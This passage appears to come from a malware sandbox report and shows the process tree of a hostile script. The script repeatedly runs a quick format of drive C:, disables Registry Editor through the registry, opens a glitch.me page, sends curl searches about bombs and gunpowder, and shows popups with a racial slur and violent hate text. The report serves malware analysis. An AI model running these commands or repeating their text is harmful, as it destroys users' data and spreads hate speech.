        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5972,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:1
        6⤵
        
        PID:2512
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=5388,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:1
        6⤵
        
        PID:2324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8360,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8352 /prefetch:1
        6⤵
        
        PID:2044
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8520,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8556 /prefetch:1
        6⤵
        
        PID:300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:8
        6⤵
        
        PID:3860
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=8924,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5360 /prefetch:1
        6⤵
        
        PID:1316
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9096,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:1
        6⤵
        
        PID:608
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=9076,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9320 /prefetch:1
        6⤵
        
        PID:6008
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=9448,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9104 /prefetch:1
        6⤵
        
        PID:2032
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=9092,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9988 /prefetch:1
        6⤵
        
        PID:6120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=9452,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10132 /prefetch:1
        6⤵
        
        PID:5008
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10352,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10332 /prefetch:1
        6⤵
        
        PID:6464
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=10508,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9580 /prefetch:1
        6⤵
        
        PID:6840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10684,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10360 /prefetch:1
        6⤵
        
        PID:1940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=10060,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9376 /prefetch:1
        6⤵
        
        PID:6676
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11004,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11112 /prefetch:1
        6⤵
        
        PID:7012
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11540,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11568 /prefetch:1
        6⤵
        
        PID:6528
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11720,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11244 /prefetch:1
        6⤵
        
        PID:7028
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11912,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11944 /prefetch:1
        6⤵
        
        PID:6512
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=11916,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12116 /prefetch:1
        6⤵
        
        PID:6312
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12360,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12388 /prefetch:1
        6⤵
        
        PID:6164
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12520,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:1
        6⤵
        
        PID:7108
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12772,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12348 /prefetch:1
        6⤵
        
        PID:6864
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13180,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13068 /prefetch:1
        6⤵
        
        PID:6952
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13364,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13396 /prefetch:1
        6⤵
        
        PID:6428
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13556,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13568 /prefetch:1
        6⤵
        
        PID:6780
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=13900,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13924 /prefetch:1
        6⤵
        
        PID:7600
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=14152,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=14184 /prefetch:1
        6⤵
        
        PID:7888
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=11228,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11012 /prefetch:1
        6⤵
        
        PID:7344
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4648
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:5224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4428
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4672
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5804
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1052
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4668
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2104
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1856
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1940
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2672
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1156
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5648
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4300
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5308
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3856
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1092
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:304
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:544
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1888
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4620
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5148
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2128
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2068
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3620
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4672
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4024
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1444
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4964
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1568
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2108
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4112
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5684
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4332
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2912
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4188
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3644
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3120
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4292
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1168
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5968
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4332
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:300
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4496
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6116
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4940
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6036
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1168
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4672
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1520
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1960
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4824
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1192
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3348
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1308
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3136
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2032
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1512
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2716
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5632
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4680
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3476
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6052
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4824
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6120
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1940
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5008
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1656
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4884
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1940
